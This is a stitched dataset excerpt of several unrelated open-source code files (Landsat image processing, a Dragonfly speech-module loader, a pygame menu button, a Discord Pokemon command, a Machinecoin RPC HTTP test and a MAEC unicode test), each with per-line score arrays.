toa_radiance(green, metadata, 3)\n", " b_rad = toa_radiance(blue, metadata, 2)\n", "\n", " r_rad.export('/data/export/landsat-rad-r.tif', singleFile=True)\n", " g_rad.export('/data/export/landsat-rad-g.tif', singleFile=True)\n", " b_rad.export('/data/export/landsat-rad-b.tif', singleFile=True)\n", "\n", " rgb = r_rad.bandcombine(g_rad, b_rad)\n", " rgb.export('/data/export/landsat-rgb-rad.tif', singleFile=True)\n", "\n", " # compute Top of Atmosphere (TOA) Reflectance of the bands (http://landsat.usgs.gov/Landsat8_Using_Product.php)\n", " r_refl = toa_reflectance(red, metadata, 4)\n", " g_refl = toa_reflectance(green, metadata, 3)\n", " b_refl = toa_reflectance(blue, metadata, 2)\n", "\n", " # combine the bands\n", " rgb = r_refl.bandcombine(g_refl, b_refl)\n", "\n", " # rgb = rgb.convert('byte', 'fit')\n", "\n", " rgb.export('/data/export/landsat-rgb-refl.tif', singleFile=True)\n", "\n", " # ones = mrgeo.load_image(\"all-ones-save\")\n", "\n", " # slope = ones.slope()\n", "\n", " # hundreds = mrgeo.load_image(\"all-hundreds\")\n", " # aspect = hundreds.aspect()\n", "\n", " # slope.save(\"slope-test\")\n", " # aspect.save(\"aspect-test\")\n", "\n", " # print(\"***** Starting *****\")\n", " # elevation = mrgeo.load_image(\"small-elevation\")\n", " # elevation.export(\"/data/export/small-elevation\", singleFile=True)\n", "\n", " # slope = small_elevation.slope()\n", " # slope.save(\"slope-test\")\n", " # print(\"***** Finished Slope 1 *****\")\n", " #\n", " # slope = small_elevation.slope(\"rad\")\n", " # slope.save(\"slope-test2\")\n", " # print(\"***** Finished Slope 2 *****\")\n", "\n", " # sub1 = small_elevation - 5\n", " # sub2 = 5 - small_elevation\n", " #\n", " # sub3 = small_elevation.clone()\n", " # sub3 -= 5\n", "\n", " # hundreds = mrgeo.load_image(\"all-hundreds-save\")\n", " # hundreds.export(\"/data/export/100-export-test\", singleFile=True)\n", " #\n", " # slope = mrgeo.load_image(\"santiago-aster\")\n", " # slope.export(\"/data/export/santiago-aster\", singleFile=True)\n", "\n", " # hundreds.export(\"/data/export/hundreds-export-test\", singleFile=True)\n", "\n", " # sub = hundreds + ones\n", " #\n", " # sub.export(\"/data/export/101-export-test\", singleFile=True)\n", "\n", "\n", " # zen = 30.0 * 0.0174532925 # sun 30 deg above the horizon\n", " # sunaz = 270.0 * 0.0174532925 # sun from 270 deg (west)\n", " #\n", " # coszen = math.cos(zen)\n", " # sinzen = math.sin(zen)\n", " #\n", " # slope = elevation.slope()\n", " # aspect = elevation.aspect()\n", " #\n", " # hill = 255 * ((coszen * slope.cos()) + (sinzen * slope.sin() * (sunaz - aspect).cos()))\n", " # # \"hill = 255.0 * ((coszen * cos(sl)) + (sinzen * sin(sl) * cos(sunaz - as)))\"\n", " #\n", " # hill.export(\"/data/export/hillshade-test\", singleFile=True)\n", "\n", "\n", " mrgeo.stop()\n", "\n", " print(\"***** Done *****\")\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009009009009009009, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.027777777777777776, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009523809523809525, 0.009345794392523364, 0.009433962264150943, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008620689655172414, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.015625, 0, 0, 0, 0, 0, 0, 0, 0, 0.010638297872340425, 0.011764705882352941, 0, 0, 0, 0, 0.058823529411764705, 0, 0 ]
182
0.000937
false
# # This file is a command-module for Dragonfly. # (c) Copyright 2008 by Christo Butcher # Licensed under the LGPL, see <http://www.gnu.org/licenses/> # """ Command-module loader for WSR ============================= This script can be used to look Dragonfly command-modules for use with Window Speech Recognition. It scans the directory it's in and loads any ``*.py`` it finds. """ import time import os.path import logging import pythoncom from dragonfly.engines.backend_sapi5.engine import Sapi5InProcEngine #--------------------------------------------------------------------------- # Set up basic logging. logging.basicConfig(level=logging.DEBUG) logging.getLogger("compound.parse").setLevel(logging.INFO) #--------------------------------------------------------------------------- # Command module class; wraps a single command-module. class CommandModule(object): _log = logging.getLogger("module") def __init__(self, path): self._path = os.path.abspath(path) self._namespace = None self._loaded = False def __str__(self): return "%s(%r)" % (self.__class__.__name__, os.path.basename(self._path)) def load(self): self._log.info("%s: Loading module: '%s'" % (self, self._path)) # Prepare namespace in which to execute the namespace = {} namespace["__file__"] = self._path # Attempt to execute the module; handle any exceptions. try: execfile(self._path, namespace) except Exception, e: self._log.error("%s: Error loading module: %s" % (self, e)) self._loaded = False return self._loaded = True self._namespace = namespace def unload(self): self._log.info("%s: Unloading module: '%s'" % (self, self._path)) def check_freshness(self): pass #--------------------------------------------------------------------------- # Command module directory class. class CommandModuleDirectory(object): _log = logging.getLogger("directory") def __init__(self, path, excludes=None): self._path = os.path.abspath(path) self._excludes = excludes self._modules = {} def load(self): valid_paths = self._get_valid_paths() # Remove any deleted modules. for path, module in self._modules.items(): if path not in valid_paths: del self._modules[path] module.unload() # Add any new modules. for path in valid_paths: if path not in self._modules: module = CommandModule(path) module.load() self._modules[path] = module else: module = self._modules[path] module.check_freshness() def _get_valid_paths(self): self._log.info("Looking for command modules here: %s" % (self._path,)) valid_paths = [] for filename in os.listdir(self._path): path = os.path.abspath(os.path.join(self._path, filename)) if not os.path.isfile(path): continue if not os.path.splitext(path)[1] == ".py": continue if path in self._excludes: continue valid_paths.append(path) self._log.info("Valid paths: %s" % (", ".join(valid_paths),)) return valid_paths #--------------------------------------------------------------------------- # Main event driving loop. def main(): logging.basicConfig(level=logging.INFO) try: path = os.path.dirname(__file__) except NameError: # The "__file__" name is not always available, for example # when this module is run from PythonWin. In this case we # simply use the current working directory. path = os.getcwd() __file__ = os.path.join(path, "dfly-loader-wsr.py") engine = Sapi5InProcEngine() engine.connect() directory = CommandModuleDirectory(path, excludes=[__file__]) directory.load() engine.speak('beginning loop!') while 1: pythoncom.PumpWaitingMessages() time.sleep(.1) if __name__ == "__main__": main()
[ "#\r\n", "# This file is a command-module for Dragonfly.\r\n", "# (c) Copyright 2008 by Christo Butcher\r\n", "# Licensed under the LGPL, see <http://www.gnu.org/licenses/>\r\n", "#\r\n", "\r\n", "\"\"\"\r\n", "Command-module loader for WSR\r\n", "=============================\r\n", "\r\n", "This script can be used to look Dragonfly command-modules \r\n", "for use with Window Speech Recognition. It scans the \r\n", "directory it's in and loads any ``*.py`` it finds.\r\n", "\r\n", "\"\"\"\r\n", "\r\n", "\r\n", "import time\r\n", "import os.path\r\n", "import logging\r\n", "import pythoncom\r\n", "\r\n", "from dragonfly.engines.backend_sapi5.engine import Sapi5InProcEngine\r\n", "\r\n", "\r\n", "#---------------------------------------------------------------------------\r\n", "# Set up basic logging.\r\n", "\r\n", "logging.basicConfig(level=logging.DEBUG)\r\n", "logging.getLogger(\"compound.parse\").setLevel(logging.INFO)\r\n", "\r\n", "\r\n", "#---------------------------------------------------------------------------\r\n", "# Command module class; wraps a single command-module.\r\n", "\r\n", "class CommandModule(object):\r\n", "\r\n", " _log = logging.getLogger(\"module\")\r\n", "\r\n", " def __init__(self, path):\r\n", " self._path = os.path.abspath(path)\r\n", " self._namespace = None\r\n", " self._loaded = False\r\n", "\r\n", " def __str__(self):\r\n", " return \"%s(%r)\" % (self.__class__.__name__,\r\n", " os.path.basename(self._path))\r\n", "\r\n", " def load(self):\r\n", " self._log.info(\"%s: Loading module: '%s'\" % (self, self._path))\r\n", "\r\n", " # Prepare namespace in which to execute the \r\n", " namespace = {}\r\n", " namespace[\"__file__\"] = self._path\r\n", "\r\n", " # Attempt to execute the module; handle any exceptions.\r\n", " try:\r\n", " execfile(self._path, namespace)\r\n", " except Exception, e:\r\n", " self._log.error(\"%s: Error loading module: %s\" % (self, e))\r\n", " self._loaded = False\r\n", " return\r\n", "\r\n", " self._loaded = True\r\n", " self._namespace = namespace\r\n", "\r\n", " def unload(self):\r\n", " self._log.info(\"%s: Unloading module: '%s'\" % (self, self._path))\r\n", "\r\n", " def check_freshness(self):\r\n", " pass\r\n", "\r\n", "\r\n", "#---------------------------------------------------------------------------\r\n", "# Command module directory class.\r\n", "\r\n", "class CommandModuleDirectory(object):\r\n", "\r\n", " _log = logging.getLogger(\"directory\")\r\n", "\r\n", " def __init__(self, path, excludes=None):\r\n", " self._path = os.path.abspath(path)\r\n", " self._excludes = excludes\r\n", " self._modules = {}\r\n", "\r\n", " def load(self):\r\n", " valid_paths = self._get_valid_paths()\r\n", "\r\n", " # Remove any deleted modules.\r\n", " for path, module in self._modules.items():\r\n", " if path not in valid_paths:\r\n", " del self._modules[path]\r\n", " module.unload()\r\n", "\r\n", " # Add any new modules.\r\n", " for path in valid_paths:\r\n", " if path not in self._modules:\r\n", " module = CommandModule(path)\r\n", " module.load()\r\n", " self._modules[path] = module\r\n", " else:\r\n", " module = self._modules[path]\r\n", " module.check_freshness()\r\n", "\r\n", " def _get_valid_paths(self):\r\n", " self._log.info(\"Looking for command modules here: %s\" % (self._path,))\r\n", " valid_paths = []\r\n", " for filename in os.listdir(self._path):\r\n", " path = os.path.abspath(os.path.join(self._path, filename))\r\n", " if not os.path.isfile(path):\r\n", " continue\r\n", " if not os.path.splitext(path)[1] == \".py\":\r\n", " continue\r\n", " if path in self._excludes:\r\n", " continue\r\n", " valid_paths.append(path)\r\n", " self._log.info(\"Valid paths: %s\" % (\", \".join(valid_paths),))\r\n", " return valid_paths\r\n", "\r\n", "\r\n", "#---------------------------------------------------------------------------\r\n", "# Main event driving loop.\r\n", "\r\n", "def main():\r\n", " logging.basicConfig(level=logging.INFO)\r\n", "\r\n", " try:\r\n", " path = os.path.dirname(__file__)\r\n", " except NameError:\r\n", " # The \"__file__\" name is not always available, for example\r\n", " # when this module is run from PythonWin. In this case we\r\n", " # simply use the current working directory.\r\n", " path = os.getcwd()\r\n", " __file__ = os.path.join(path, \"dfly-loader-wsr.py\")\r\n", "\r\n", " engine = Sapi5InProcEngine()\r\n", " engine.connect()\r\n", "\r\n", " directory = CommandModuleDirectory(path, excludes=[__file__])\r\n", " directory.load()\r\n", "\r\n", " engine.speak('beginning loop!')\r\n", " while 1:\r\n", " pythoncom.PumpWaitingMessages()\r\n", " time.sleep(.1)\r\n", "\r\n", "if __name__ == \"__main__\":\r\n", " main()\r\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.016666666666666666, 0.017857142857142856, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.018518518518518517, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0 ]
148
0.000946
false
import pygame from pygame.surface import Surface from Menu.LoadGameMenu.LoadGameMenu import LoadGameMenu from Menu.StartMenu.StartMenuItems.StartMenuItem import StartMenuItem from Vector2 import Vector2 class LoadGame(StartMenuItem): def __init__(self, offset: Vector2, image: Surface = None, hover: Surface = None, rect=None, newState=None): image = image if image is not None else pygame.image.load('images/buttons/loadButton.png').convert_alpha() hover = hover if hover is not None else pygame.image.load('images/buttons/loadButtonHover.png').convert_alpha() super().__init__(offset, image, hover, rect) self._newState = newState def Update(self, game): if self.IsClickedByMouse(game): self._newState = LoadGameMenu(game.Settings.Resolution) nself = super().Update(game) return LoadGame(nself.Offset, nself.Image, nself.Hover, nself.Rect, self._newState) def Draw(self, game): super().Draw(game) def GetNewState(self): return self._newState
[ "import pygame\n", "from pygame.surface import Surface\n", "\n", "from Menu.LoadGameMenu.LoadGameMenu import LoadGameMenu\n", "from Menu.StartMenu.StartMenuItems.StartMenuItem import StartMenuItem\n", "from Vector2 import Vector2\n", "\n", "\n", "class LoadGame(StartMenuItem):\n", " def __init__(self, offset: Vector2, image: Surface = None, hover: Surface = None, rect=None, newState=None):\n", " image = image if image is not None else pygame.image.load('images/buttons/loadButton.png').convert_alpha()\n", " hover = hover if hover is not None else pygame.image.load('images/buttons/loadButtonHover.png').convert_alpha()\n", " super().__init__(offset, image, hover, rect)\n", " self._newState = newState\n", "\n", " def Update(self, game):\n", " if self.IsClickedByMouse(game):\n", " self._newState = LoadGameMenu(game.Settings.Resolution)\n", " nself = super().Update(game)\n", " return LoadGame(nself.Offset, nself.Image, nself.Hover, nself.Rect, self._newState)\n", "\n", " def Draw(self, game):\n", " super().Draw(game)\n", "\n", " def GetNewState(self):\n", " return self._newState\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008849557522123894, 0.008695652173913044, 0.008333333333333333, 0, 0, 0, 0, 0, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0 ]
26
0.001413
false
import aiohttp import discord async def pokemon(cmd, message, args): poke_input = ' '.join(args) pokemon_url = ('http://pokeapi.co/api/v2/pokemon/' + poke_input.lower()) try: async with aiohttp.ClientSession() as session: async with session.get(pokemon_url) as data: poke = await data.json() except Exception as e: cmd.log.error(e) await message.channel.send('We had trouble communicating with the API.') return try: poke_id = str(poke['id']) name = str(poke['name']).title() number = str(poke['order']) embed = discord.Embed(color=0x1ABC9C) height = str(poke['height'] / 10) + 'm' weight = str(poke['weight'] / 10) + 'kg' image = 'https://randompokemon.com/sprites/animated/' + poke_id + '.gif' sprite = poke['sprites']['front_default'] embed.set_author(name='#' + number + ': ' + name, icon_url=sprite, url=sprite) embed.set_image(url=image) embed.add_field(name='Measurements', value='```\nHeight: ' + height + '\nWeight: ' + weight + '\n```') type_text = '' type_urls = [] ability_text = '' for ptype in poke['types']: type_text += '\n' + ptype['type']['name'].title() type_urls.append(ptype['type']['url']) for ability in poke['abilities']: if ability['is_hidden']: hidden = 'Hidden' else: hidden = 'Visible' ability_text += '\n' + ability['ability']['name'].title() + '\n - ' + hidden weak_against = [] strong_against = [] good_relations = ['no_damage_from', 'half_damage_from', 'double_damage_to'] bad_relations = ['no_damage_to', 'half_damage_to', 'double_damage_from'] for type_url in type_urls: async with aiohttp.ClientSession() as session: async with session.get(type_url) as data: type_data = await data.json() dr = type_data['damage_relations'] for relation in good_relations: for ptype in dr[relation]: if ptype['name'].title() not in strong_against: strong_against.append(ptype['name'].title()) for relation in bad_relations: for ptype in dr[relation]: if ptype['name'].title() not in weak_against: weak_against.append(ptype['name'].title()) embed.add_field(name='Types', value='```\n' + type_text + '\n```') embed.add_field(name='Abilities', value='```\n' + ability_text + '\n```') embed.add_field(name='Strong Against', value='```\n' + '\n'.join(strong_against) + '\n```') embed.add_field(name='Weak Against', value='```\n' + '\n'.join(weak_against) + '\n```') await message.channel.send(None, embed=embed) except Exception as e: await message.channel.send('An error has occurred.')
[ "import aiohttp\n", "import discord\n", "\n", "\n", "async def pokemon(cmd, message, args):\n", " poke_input = ' '.join(args)\n", "\n", " pokemon_url = ('http://pokeapi.co/api/v2/pokemon/' + poke_input.lower())\n", " try:\n", " async with aiohttp.ClientSession() as session:\n", " async with session.get(pokemon_url) as data:\n", " poke = await data.json()\n", " except Exception as e:\n", " cmd.log.error(e)\n", " await message.channel.send('We had trouble communicating with the API.')\n", " return\n", "\n", " try:\n", " poke_id = str(poke['id'])\n", " name = str(poke['name']).title()\n", " number = str(poke['order'])\n", " embed = discord.Embed(color=0x1ABC9C)\n", " height = str(poke['height'] / 10) + 'm'\n", " weight = str(poke['weight'] / 10) + 'kg'\n", " image = 'https://randompokemon.com/sprites/animated/' + poke_id + '.gif'\n", " sprite = poke['sprites']['front_default']\n", " embed.set_author(name='#' + number + ': ' + name, icon_url=sprite, url=sprite)\n", " embed.set_image(url=image)\n", " embed.add_field(name='Measurements', value='```\\nHeight: ' + height + '\\nWeight: ' + weight + '\\n```')\n", " type_text = ''\n", " type_urls = []\n", " ability_text = ''\n", " for ptype in poke['types']:\n", " type_text += '\\n' + ptype['type']['name'].title()\n", " type_urls.append(ptype['type']['url'])\n", " for ability in poke['abilities']:\n", " if ability['is_hidden']:\n", " hidden = 'Hidden'\n", " else:\n", " hidden = 'Visible'\n", " ability_text += '\\n' + ability['ability']['name'].title() + '\\n - ' + hidden\n", " weak_against = []\n", " strong_against = []\n", " good_relations = ['no_damage_from', 'half_damage_from', 'double_damage_to']\n", " bad_relations = ['no_damage_to', 'half_damage_to', 'double_damage_from']\n", " for type_url in type_urls:\n", " async with aiohttp.ClientSession() as session:\n", " async with session.get(type_url) as data:\n", " type_data = await data.json()\n", " dr = type_data['damage_relations']\n", " for relation in good_relations:\n", " for ptype in dr[relation]:\n", " if ptype['name'].title() not in strong_against:\n", " strong_against.append(ptype['name'].title())\n", " for relation in bad_relations:\n", " for ptype in dr[relation]:\n", " if ptype['name'].title() not in weak_against:\n", " weak_against.append(ptype['name'].title())\n", " embed.add_field(name='Types', value='```\\n' + type_text + '\\n```')\n", " embed.add_field(name='Abilities', value='```\\n' + ability_text + '\\n```')\n", " embed.add_field(name='Strong Against', value='```\\n' + '\\n'.join(strong_against) + '\\n```')\n", " embed.add_field(name='Weak Against', value='```\\n' + '\\n'.join(weak_against) + '\\n```')\n", "\n", " await message.channel.send(None, embed=embed)\n", " except Exception as e:\n", " await message.channel.send('An error has occurred.')\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0.011494252873563218, 0, 0.009009009009009009, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011235955056179775, 0, 0, 0.011904761904761904, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012195121951219513, 0.01, 0.010416666666666666, 0, 0, 0, 0 ]
66
0.001717
false
#!/usr/bin/env python3 # Copyright (c) 2014-2018 The Machinecoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test the RPC HTTP basics.""" from test_framework.test_framework import MachinecoinTestFramework from test_framework.util import assert_equal, str_to_b64str import http.client import urllib.parse class HTTPBasicsTest (MachinecoinTestFramework): def set_test_params(self): self.num_nodes = 3 def setup_network(self): self.setup_nodes() def run_test(self): ################################################# # lowlevel check for http persistent connection # ################################################# url = urllib.parse.urlparse(self.nodes[0].url) authpair = url.username + ':' + url.password headers = {"Authorization": "Basic " + str_to_b64str(authpair)} conn = http.client.HTTPConnection(url.hostname, url.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert(b'"error":null' in out1) assert(conn.sock!=None) #according to http/1.1 connection must still be open! #send 2nd request without closing connection conn.request('POST', '/', '{"method": "getchaintips"}', headers) out1 = conn.getresponse().read() assert(b'"error":null' in out1) #must also response with a correct json-rpc message assert(conn.sock!=None) #according to http/1.1 connection must still be open! conn.close() #same should be if we add keep-alive because this should be the std. behaviour headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"} conn = http.client.HTTPConnection(url.hostname, url.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert(b'"error":null' in out1) assert(conn.sock!=None) #according to http/1.1 connection must still be open! #send 2nd request without closing connection conn.request('POST', '/', '{"method": "getchaintips"}', headers) out1 = conn.getresponse().read() assert(b'"error":null' in out1) #must also response with a correct json-rpc message assert(conn.sock!=None) #according to http/1.1 connection must still be open! conn.close() #now do the same with "Connection: close" headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"} conn = http.client.HTTPConnection(url.hostname, url.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert(b'"error":null' in out1) assert(conn.sock==None) #now the connection must be closed after the response #node1 (2nd node) is running with disabled keep-alive option urlNode1 = urllib.parse.urlparse(self.nodes[1].url) authpair = urlNode1.username + ':' + urlNode1.password headers = {"Authorization": "Basic " + str_to_b64str(authpair)} conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert(b'"error":null' in out1) #node2 (third node) is running with standard keep-alive parameters which means keep-alive is on urlNode2 = urllib.parse.urlparse(self.nodes[2].url) authpair = urlNode2.username + ':' + urlNode2.password headers = {"Authorization": "Basic " + str_to_b64str(authpair)} conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert(b'"error":null' in out1) assert(conn.sock!=None) #connection must be closed because machinecoind should use keep-alive by default # Check excessive request size conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port) conn.connect() conn.request('GET', '/' + ('x'*1000), '', headers) out1 = conn.getresponse() assert_equal(out1.status, http.client.NOT_FOUND) conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port) conn.connect() conn.request('GET', '/' + ('x'*10000), '', headers) out1 = conn.getresponse() assert_equal(out1.status, http.client.BAD_REQUEST) if __name__ == '__main__': HTTPBasicsTest ().main ()
[ "#!/usr/bin/env python3\n", "# Copyright (c) 2014-2018 The Machinecoin Core developers\n", "# Distributed under the MIT software license, see the accompanying\n", "# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n", "\"\"\"Test the RPC HTTP basics.\"\"\"\n", "\n", "from test_framework.test_framework import MachinecoinTestFramework\n", "from test_framework.util import assert_equal, str_to_b64str\n", "\n", "import http.client\n", "import urllib.parse\n", "\n", "class HTTPBasicsTest (MachinecoinTestFramework):\n", " def set_test_params(self):\n", " self.num_nodes = 3\n", "\n", " def setup_network(self):\n", " self.setup_nodes()\n", "\n", " def run_test(self):\n", "\n", " #################################################\n", " # lowlevel check for http persistent connection #\n", " #################################################\n", " url = urllib.parse.urlparse(self.nodes[0].url)\n", " authpair = url.username + ':' + url.password\n", " headers = {\"Authorization\": \"Basic \" + str_to_b64str(authpair)}\n", "\n", " conn = http.client.HTTPConnection(url.hostname, url.port)\n", " conn.connect()\n", " conn.request('POST', '/', '{\"method\": \"getbestblockhash\"}', headers)\n", " out1 = conn.getresponse().read()\n", " assert(b'\"error\":null' in out1)\n", " assert(conn.sock!=None) #according to http/1.1 connection must still be open!\n", "\n", " #send 2nd request without closing connection\n", " conn.request('POST', '/', '{\"method\": \"getchaintips\"}', headers)\n", " out1 = conn.getresponse().read()\n", " assert(b'\"error\":null' in out1) #must also response with a correct json-rpc message\n", " assert(conn.sock!=None) #according to http/1.1 connection must still be open!\n", " conn.close()\n", "\n", " #same should be if we add keep-alive because this should be the std. behaviour\n", " headers = {\"Authorization\": \"Basic \" + str_to_b64str(authpair), \"Connection\": \"keep-alive\"}\n", "\n", " conn = http.client.HTTPConnection(url.hostname, url.port)\n", " conn.connect()\n", " conn.request('POST', '/', '{\"method\": \"getbestblockhash\"}', headers)\n", " out1 = conn.getresponse().read()\n", " assert(b'\"error\":null' in out1)\n", " assert(conn.sock!=None) #according to http/1.1 connection must still be open!\n", "\n", " #send 2nd request without closing connection\n", " conn.request('POST', '/', '{\"method\": \"getchaintips\"}', headers)\n", " out1 = conn.getresponse().read()\n", " assert(b'\"error\":null' in out1) #must also response with a correct json-rpc message\n", " assert(conn.sock!=None) #according to http/1.1 connection must still be open!\n", " conn.close()\n", "\n", " #now do the same with \"Connection: close\"\n", " headers = {\"Authorization\": \"Basic \" + str_to_b64str(authpair), \"Connection\":\"close\"}\n", "\n", " conn = http.client.HTTPConnection(url.hostname, url.port)\n", " conn.connect()\n", " conn.request('POST', '/', '{\"method\": \"getbestblockhash\"}', headers)\n", " out1 = conn.getresponse().read()\n", " assert(b'\"error\":null' in out1)\n", " assert(conn.sock==None) #now the connection must be closed after the response\n", "\n", " #node1 (2nd node) is running with disabled keep-alive option\n", " urlNode1 = urllib.parse.urlparse(self.nodes[1].url)\n", " authpair = urlNode1.username + ':' + urlNode1.password\n", " headers = {\"Authorization\": \"Basic \" + str_to_b64str(authpair)}\n", "\n", " conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)\n", " conn.connect()\n", " conn.request('POST', '/', '{\"method\": \"getbestblockhash\"}', headers)\n", " out1 = conn.getresponse().read()\n", " assert(b'\"error\":null' in out1)\n", "\n", " #node2 (third node) is running with standard keep-alive parameters which means keep-alive is on\n", " urlNode2 = urllib.parse.urlparse(self.nodes[2].url)\n", " authpair = urlNode2.username + ':' + urlNode2.password\n", " headers = {\"Authorization\": \"Basic \" + str_to_b64str(authpair)}\n", "\n", " conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)\n", " conn.connect()\n", " conn.request('POST', '/', '{\"method\": \"getbestblockhash\"}', headers)\n", " out1 = conn.getresponse().read()\n", " assert(b'\"error\":null' in out1)\n", " assert(conn.sock!=None) #connection must be closed because machinecoind should use keep-alive by default\n", "\n", " # Check excessive request size\n", " conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)\n", " conn.connect()\n", " conn.request('GET', '/' + ('x'*1000), '', headers)\n", " out1 = conn.getresponse()\n", " assert_equal(out1.status, http.client.NOT_FOUND)\n", "\n", " conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)\n", " conn.connect()\n", " conn.request('GET', '/' + ('x'*10000), '', headers)\n", " out1 = conn.getresponse()\n", " assert_equal(out1.status, http.client.BAD_REQUEST)\n", "\n", "\n", "if __name__ == '__main__':\n", " HTTPBasicsTest ().main ()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02040816326530612, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.05813953488372093, 0, 0.018867924528301886, 0, 0, 0.03260869565217391, 0.05813953488372093, 0, 0, 0.022988505747126436, 0.01, 0, 0, 0, 0, 0, 0, 0.05813953488372093, 0, 0.018867924528301886, 0, 0, 0.03260869565217391, 0.05813953488372093, 0, 0, 0.02, 0.02127659574468085, 0, 0, 0, 0, 0, 0, 0.05813953488372093, 0, 0.014492753623188406, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.04424778761061947, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.06666666666666667 ]
108
0.005861
false
# -*- coding: utf-8 -*- # Copyright (c) 2018, The MITRE Corporation. All rights reserved. # See LICENSE.txt for complete terms. """Tests for various encoding issues throughout the library""" import unittest from mixbox import binding_utils from mixbox.vendor.six import text_type from maec.package.malware_subject import MalwareConfigurationParameter from maec.package.analysis import DynamicAnalysisMetadata from maec.package.grouping_relationship import GroupingRelationship from maec.bundle.bundle import Bundle from maec.bundle.av_classification import AVClassification from maec.bundle.behavior import Behavior from maec.bundle.capability import Capability import maec.utils from cybox.test import round_trip UNICODE_STR = u"❤ ♎ ☀ ★ ☂ ♞ ☯ ☭ ☢ €☎⚑ ❄♫✂" class EncodingTests(unittest.TestCase): @classmethod def setUpClass(cls): cls.orig_encoding = binding_utils.ExternalEncoding binding_utils.ExternalEncoding = 'utf-16' @classmethod def tearDownClass(cls): binding_utils.ExternalEncoding = cls.orig_encoding def test_malware_configuration_parameter(self): config = MalwareConfigurationParameter() config.value = UNICODE_STR config2 = round_trip(config) self.assertEqual(config.value, config2.value) def test_dynamic_analysis_metadata(self): metadata = DynamicAnalysisMetadata() metadata.command_line = UNICODE_STR metadata2 = round_trip(metadata) self.assertEqual(metadata.command_line, metadata2.command_line) def test_grouping_relationship(self): relationship = GroupingRelationship() relationship.malware_family_name = UNICODE_STR relationship.malware_toolkit_name = UNICODE_STR relationship2 = round_trip(relationship) self.assertEqual(relationship.malware_family_name, relationship2.malware_family_name) self.assertEqual(relationship.malware_toolkit_name, relationship2.malware_toolkit_name) def test_behavior(self): behavior = Behavior() behavior.description = UNICODE_STR behavior2 = round_trip(behavior) self.assertEqual(behavior.description, behavior2.description) def test_capability(self): capability = Capability() capability.description = UNICODE_STR capability2 = round_trip(capability) self.assertEqual(capability.description, capability2.description) def test_av_classification(self): av_class = AVClassification() av_class.engine_version = UNICODE_STR av_class.definition_version = UNICODE_STR av_class.classification_name = UNICODE_STR av_class2 = round_trip(av_class) self.assertEqual(av_class.engine_version, av_class2.engine_version) self.assertEqual(av_class.definition_version, av_class2.definition_version) self.assertEqual(av_class.classification_name, av_class2.classification_name) def test_to_xml_utf16_encoded(self): encoding = 'utf-16' b = Behavior() b.description = UNICODE_STR xml = 